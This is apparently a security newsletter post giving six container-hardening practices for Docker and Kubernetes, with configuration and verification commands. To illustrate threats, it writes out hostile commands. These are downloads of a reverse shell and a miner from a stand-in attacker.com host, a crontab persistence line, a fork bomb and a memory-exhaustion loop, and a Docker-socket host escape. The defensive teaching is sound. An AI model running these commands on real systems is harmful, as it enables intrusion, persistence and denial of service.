How To Secure Your Containers ? 6 Practical Security Best Practice You Don't Want To Miss

Feb 23, 2026

A single misconfigured container gave attackers root access to an entire Kubernetes cluster in the Tesla breach. The attack path was shockingly simple:

Found publicly exposed Kubernetes dashboard (no authentication)
Deployed privileged container
Mounted host filesystem
Gained root on all cluster nodes
Installed crypto-mining software across 100+ EC2 instances

If you’re building your container security strategy and don’t know where to start, this guide covers the 6 critical controls(in priority order) that prevent container escapes and host compromise.

Critical Control

Run containers as non-root
Drop unnecessary capabilities

High Priority

Make containers read-only (immutable)
Limit resources (prevent DoS)

Important

Secure Docker socket access
Enable comprehensive logging

Let’s dive in.

1. Run Containers as Non-Root Users

Containers run as root by default. This creates a dangerous privilege escalation:

Non-root user on host → Starts container → Container runs as root

Without user namespace enabled, root inside the container is root on the host.

If an attacker can escape a container that is running as root, they have full root access to the host machine, which means

Access to all files on the host
Lateral movements across network
Ability to read secrets from other containers
Ability to deploy additional malicious containers.

Real-World Attack Example

Docker Hub Cryptojacking (2019):

1. Attacker deployed malicious image to Docker Hub
2. Image ran as root by default
3. Container escaped via kernel exploit
4. Gained root on host
5. Deployed cryptominers across entire infrastructure

Cost: Thousands in unauthorized AWS charges before detection

So, What’s the Solution ?

Option 1: Set Non-Root User in Dockerfile (Recommended)

FROM nginx:alpine

# Create non-root user
RUN addgroup -g 1000 appuser && adduser -D -u 1000 -G appuser appuser

# Install tools BEFORE switching user (still root here)
RUN apk add --no-cache libcap curl wget

# Change nginx to listen on 8080. Find and replace 80 from ngginx confif file.
RUN sed -i 's/listen\s*80;/listen 8080;/g' /etc/nginx/conf.d/default.conf && \
    sed -i 's/listen\s*\[::\]:80;/listen [::]:8080;/g' /etc/nginx/conf.d/default.conf

# Change ownership of necessary directories
RUN chown -R appuser:appuser /var/cache/nginx && \
    chown -R appuser:appuser /var/log/nginx && \
    chown -R appuser:appuser /etc/nginx/conf.d && \
# root has ownership of nginx.pid by default. Changing ownership to appuser
    touch /run/ngnix.pd && \
    chown -R appuser:appuser /run

# Switch to non-root user
USER appuser

# Use port > 1024 (non-root can't bind to ports < 1024)
EXPOSE 8080

Why this is better: Baked into the image, works everywhere, can't be overridden accidentally.

Option 2: Specify User at Runtime

# Docker
docker run --user 1000:1000 -p 8080:8080 myapp:latest

# Docker Compose
services:
  web:
    image: myapp:latest
    user: "1000:1000"

# Kubernetes
apiVersion: v1
kind: Pod
metadata:
  name: myapp
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    runAsGroup: 1000
  containers:
  - name: app
    image: myapp:latest

Verify It's Working

# Check which user the container is running as
docker exec <container-id> whoami
# Expected output: appuser (NOT root)

# Or check process owner
docker exec <container-id> ps aux
# Expected: Processes owned by appuser (UID 1000)

# Kubernetes verification
kubectl exec <pod-name> -- whoami
# Expected output: appuser

2. Drop Unnecessary Capability Privileges

Linux has over 30 capabilities that determine what privileged operations a process can perform.

By default, Docker grants containers 14 capabilities—far more than most applications need.

Common capabilities Docker grants by default

CAP_NET_BIND_SERVICE - Bind to ports below 1024.
CAP_NET_RAW - Use RAW & PACKET sockets (for ping, traceroute).
CAP_CHOWN - Change file ownership.
CAP_DAC_OVERRIDE - Bypass file permission checks.
CAP_FOWNER - Bypass permission checks on file operations.
CAP_SETUID / CAP_SETGID - Change user/group IDs
CAP_SYS_CHROOT - Use chroot()
CAP_SYS_ADMIN - Mount filesystems, many admin ops.
CAP_SYS_MODULE - Load/unload kernel modules
CAP_PTRACE - Trace/debug processes

Each unnecessary capability is an attack vector.

If an attacker gains code execution in your container, these capabilities determine what they can do next.

Real Attack Scenario

Capability Abuse Chain:

1. Attacker exploits RCE vulnerability in web app
2. Container has CAP_SYS_ADMIN (not needed for the app)
3. Attacker uses this capability to mount host filesystem
4. Reads /etc/shadow from host
5. Cracks passwords, gains SSH access to host
6. Full infrastructure compromise

Audit Your Current Capabilities

# Check what capabilities your container currently has
docker run -it --privileged alpine sh -c 'apk add -U libcap; capsh --print | grep Current'

# Output example:
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,
cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,
cap_mknod,cap_audit_write,cap_setfcap=eip

That’s 14 capabilities. Does your app need that ?

The Solution: Drop All, Add Only Whats Needed

# Drop all capabilities, add only NET_BIND_SERVICE (if needed)
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE myapp:latest

Docker Compose

services:
  web:
    image: myapp:latest
    cap_drop:
      - ALL
    cap_add:
      - NET_BIND_SERVICE  # Only if binding to port < 1024

Kubernetes

apiVersion: v1
kind: Pod
metadata:
  name: myapp
spec:
  containers:
  - name: app
    image: myapp:latest
    securityContext:
      capabilities:
        drop:
          - ALL
        add:
          - NET_BIND_SERVICE  # Only if needed

Verify it’s working

# Check container's actual capabilities
docker inspect <container-id> | jq '.[0].HostConfig.CapDrop'
# Expected: ["ALL"]

docker inspect <container-id> | jq '.[0].HostConfig.CapAdd'
# Expected: ["NET_BIND_SERVICE"] or null

# Verify at runtime
docker exec <container-id> sh -c 'apk add libcap && capsh --print | grep Current'
# Should show minimal capabilities

3. Make Containers Immutable(Read-Only Filesystem)

By default, containers have read-write access to their entire filesystem. This allows attackers to:

Download additional tools (curl, wget, netcat)
Install backdoors and persistence mechanisms
Modify application code
Write malicious scripts
Create new files for data exfiltration

This is called drift prevention failure—allowing executables to run that weren’t present when the image was scanned.

Real Attack Example: Container Drift Attack

1. Attacker exploits RCE in web application
2. Downloads reverse shell: curl attacker.com/shell.sh > /tmp/shell.sh
3. Installs crypto miner: wget attacker.com/miner && chmod +x miner
4. Modifies application code: echo "backdoor" >> /app/server.py
5. Creates persistence: echo "*/5 * * * * /tmp/shell.sh" > /etc/crontab

If the filesystem was read-only, steps 2-5 would all fail.

The Solution: Enable Read-Only Filesystem

Docker

docker run \
  --name myapp \
  --read-only \
  --user 1000:1000 \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --tmpfs /tmp:rw,noexec,nosuid,size=100m,uid=1000,gid=1000 \
  --tmpfs /var/run:rw,noexec,nosuid,size=50m,uid=1000,gid=1000 \
  --tmpfs /var/cache/nginx:rw,size=100m,uid=1000,gid=1000 \
  -p 8080:8080 \
  myapp:latest

Why tmpfs? Applications often need to write temporary files. tmpfs creates a temporary, in-memory filesystem that:

Allows writes (needed for temp files)
Prevents execution (noexec flag)
Gets wiped on container restart
Never touches the host disk

Note: tmpfs always overrides Dockerfile permissions at runtime.

Dockerfile chown  →  sets ownership in the IMAGE
--tmpfs mount     →  creates a BRAND NEW empty filesystem at runtime
                     and mounts it OVER the image directory
                     wiping out any ownership you set in Dockerfile

So the sequence at runtime is:
1. Container starts
2. Image layers loaded (your chown is here ✓)
3. --tmpfs mounts fresh empty filesystem OVER /var/cache/nginx  ← overwrites chown!
4. New tmpfs is owned by root by default, hence uid and gid required at runtime.
5. nginx (running as appuser), tmpfs owned by appsuer

Verify It’s Working

# 1. Check read-only status
docker inspect <container-id> | jq '.[0].HostConfig.ReadonlyRootfs'
# Expected: true

# 2. Try to write a file (should fail)
docker exec <container-id> touch /test.txt
# Expected: "Read-only file system" error

# 3. Verify tmpfs mounts exist and work
docker exec <container-id> df -h | grep tmpfs
# Expected: Shows /tmp, /var/run mounted as tmpfs

docker exec <container-id> touch /tmp/test.txt
# Expected: Success (tmpfs is writable)

# 4. Try to execute from tmpfs (should fail due to noexec)
docker exec <container-id> sh -c 'echo "#!/bin/sh" > /tmp/test.sh && chmod +x /tmp/test.sh && /tmp/test.sh'
# Expected: "Permission denied" (noexec prevents execution)

Deploy Golden Image Containers(GCI)

What are Golden Images ? Pre-built hardened base images with all required software already installed.

Benefits:

No package installation at runtime(prevents drfit)
Faster container startup(no apt-get/yum during boot)
Consistent versions across all containers
Scan once, deploy everywhere.

4. Limit Resource Usage(Prevent DoS)

By default, containers have unlimited access to host resources:

CPU
Memory
Disk I/O
Process count

A single compromised container can:

Consume 100% CPU(starve other containers)
Exhaust all memory(crash the host)
Fork-bomb with unlimited processes(DoS)
Fill disk with logs(crash the host)

Real Attack Example: Resource Exhaustion

# Attacker gains access to container without resource limits
# Launches fork bomb:
:(){ :|:& };:

# Or memory exhaustion:
while true; do 
  x="$x$x"  # Doubles memory usage each iteration
done

# Result:
# - Host runs out of memory
# - Kernel OOM killer starts killing processes
# - Other containers crash
# - Host becomes unresponsive
# - Manual reboot required

Blast radius: Entire host and all containers.

The Solution: Controls Groups(cgroups)

What are cgroups?
Control Groups limit the resources (CPU, memory, I/O, PIDs) that a group of processes can use.

Docker: Limit CPU and Memory

docker run \
  --memory="512m" \
  --memory-swap="512m" \
  --cpus="1.5" \
  --pids-limit=100 \
  --restart=on-failure:5 \
  myapp:latest

Reservations vs Limits

reservations - Guaranteed minimum resources
limits - Hard maximum(cannot exceed)

How to Determine Appropriate Limits

Step 1: Measure baseline usage

# Monitor container for 24 hours under normal load
docker stats <container-id>

# Output:
CONTAINER ID   NAME     CPU %    MEM USAGE / LIMIT     MEM %
abc123         myapp    45.5%    320MiB / 512MiB      62.5%

# Peak usage observed: 400MB memory, 1.2 CPU cores

Step 2: Set limits with 20-30% buffer

Observed peak: 400MB
Buffer: 400MB * 1.3 = 520MB
Limit: 512MB (rounded)

Observed peak: 1.2 CPU
Buffer: 1.2 * 1.25 = 1.5 CPU
Limit: 1.5 CPUs

Step 3: Test under load

# Load test the container
ab -n 10000 -c 100 http://localhost:8080/

# Monitor for OOM kills or CPU throttling
docker stats <container-id>
docker events --filter 'event=oom'

Step 3: Adjust based on results

If OOMKilled events occur → Increase memory limit
If CPU % constantly at 100% → Increase CPU limit
If no issues after 1 week → Limits are appropriate

Verify It’s Working

# 1. Check configured limits
docker inspect <container-id> | jq '.[0].HostConfig.Memory'
# Expected: 536870912 (512MB in bytes)

# 2. Test memory limit
docker exec <container-id> sh -c 'cat /dev/zero | head -c 600m | tail'
# Expected: Process killed (OOMKilled) before filling 600MB

# 3. Monitor real-time usage
docker stats <container-id>
# Verify usage stays under limits

# 4. Check for OOM kills in logs
docker events --filter 'event=oom' --since 1h
# Should show OOM events if limit was exceeded

5. Secure Docker Socket

What is Docker socket?

/var/run/docker.sock = the API endpoint to control Docker daemon(service)

The owner of this socket is root.

Giving container access to docker socket is equivalent to giving unrestricted root access to your host.

Compromised container can create, run, delete any container on the host.

Real Attack Example

# Container has access to Docker socket
# Container can use Docker API to create a new container
# Attacker gains access to container with Docker socket mounted
docker exec -it compromised-container bash

# New container mounts host filesystem (-v /:/host)
# Inside container, attacker runs:
docker run -it --rm -v /:/host alpine chroot /host bash

# New container runs as root (default)
# Attacker now has root shell on the HOST, not just container
# Can read /etc/shadow, SSH keys, cloud credentials, everything

The Solution:

1. Don’t Mount Socket At All

# Dangerous
docker run -v /var/run/docker.sock:/var/run/docker.sock myapp

# Safe - don't mount it at all
docker run myapp

If your application doesn’t absolutely need Docker API access, don’t give it any access to the socket.

Most applications DON’T need Docker socket access. Common reasons people mount it (and alternatives):

To restart container - Use K8 liveness/readiness probe
To deploy new containers - Use CI/CD pipeline. not-in container deployements.
To get container metrics - Use Prometheus or cloud-native monitoring.
To manage Docker from web UI - Use Portainer.

2. Use Podman instead — it's daemonless so there's no socket running as root.

3. Use a Socket Proxy- if mounting is absolutely necessary:

Instead of mounting the Docker socket directly, use a socket proxy that:

Filters which Docker API calls are allowed
Blocks dangerous operations (mounting volumes, privileged mode)
Logs all API requests
Enforces rate limiting

Examples of proxy solution includes

Docker Socket Proxy from Linuxserver.io
Socket proxy from Tecnative.

6. Enable Comprehensive Logging

According to The OWASP site , breach took on average 191 days to detect in 2016. More recent data(IBM 2024) shows this has increased to 277 days.

Why ? Many organisation fails to:

Log container events
Monitor for suspicious activity
Alert on security-relevant actions
Retain logs for forensic analysis

Without logging, attacker operate undetected for months.

What should you log (Minimum)

Container Lifecycle Events

# What to capture:
- Container start/stop/restart events
- Image used (name, tag, digest)
- User/service account that initiated the action
- Container configuration (ports, volumes, capabilities)

Access to Secrets and Sensitive Data, detects credentials theft & lateral movement

# What to capture:
- Secret retrieval from secret stores
- Environment variable access
- Volume mounts to sensitive directories
- Failed authentication attempts

Privilege Escalation Attempts, detects attempts to get elevated privileges

# What to capture:
- Capability additions (especially CAP_SYS_ADMIN)
- Privileged mode usage (--privileged flag)
- UID/GID changes
- sudo/su usage inside containers
- Root process execution

Network Connection, detects C2 communication and data exfiltration

# What to capture:
- Inbound connections (source IP, port)
- Outbound connections (destination IP, port, domain)
- DNS queries (especially to unusual TLDs)
- Connection attempts from unexpected countries

Volume Mount Events, detects container escape attempts

# What to capture:
- Volume mount paths
- Mount permissions (rw vs ro)
- Sensitive mounts (/var/run/docker.sock, /etc, /proc)

Failed Operations, detects reconnaissance and attack attempts

# What to capture:
- Failed network connection attempts
- Failed file write/read attempts
- Failed permission changes
- Failed capability usage
- API authentication failures

Log Retention and Analysis

Retention Policy:

Security events - Cold Storage for 1 years
Container lifecycle - Warm Storage(S3 Standard) for 90 days.
Application logs - Hot storage(ElasticSearch) for 30 days
Debug logs - Hot storage(ElasticSearch) for 7 days

Your Path Forward - Implementation Roadmap

Critical Controls

Audit all containers for root user
Add USER directive to top 5 critical Dockerfiles
Rebuild and deploy with non-root user
Verify: docker exec <container> whoami returns non-root

High Priority Controls

Drop ALL capabilities, add back only needed ones
Add --read-only flag to all containers
Configure tmpfs for /tmp, /var/run
Set memory and CPU limits based on baseline usage
Verify containers still function correctly

Socket Security & Logging

Audit containers with Docker socket mounted
Deploy socket proxy for containers that need Docker API
Remove direct socket mounts
Set up centralized logging (Fluentd/CloudWatch/Splunk)
Configure Falco for runtime security monitoring
Create alerts for critical security events

Golden Images & Refinement

Create 3-5 golden base images
Migrate applications to golden images
Fine-tune resource limits based on production data
Review and tune Falco rules (reduce false positives)
Document all security controls and exceptions
Train team on new security practices

Final Thought

Many attack could be prevented if these 6 controls had been in place:

Resource limits → Mining activity would have been throttled.
Dropped capabilities → Attacker couldn’t escalate privileges.
Non-root user → Attacker couldn’t write to system directories.
Logging → Suspicious activity detected sooner.
Read-only filesystem → Attacker couldn’t download malware.
No Docker socket access → Attacker couldn’t deploy more containers

Chat Soon,
Kushal

What did you think of today’s newsletter?

❤️ Loved it? → Refer it to a friend or drop a ‘Like‘ below.

🥳 Just joined? → Start here: 9 Security Principals Beginners Must Know

💡 Have ideas? → Hit reply and tell me how I can make this more useful for you.

Discussion about this post

Ready for more?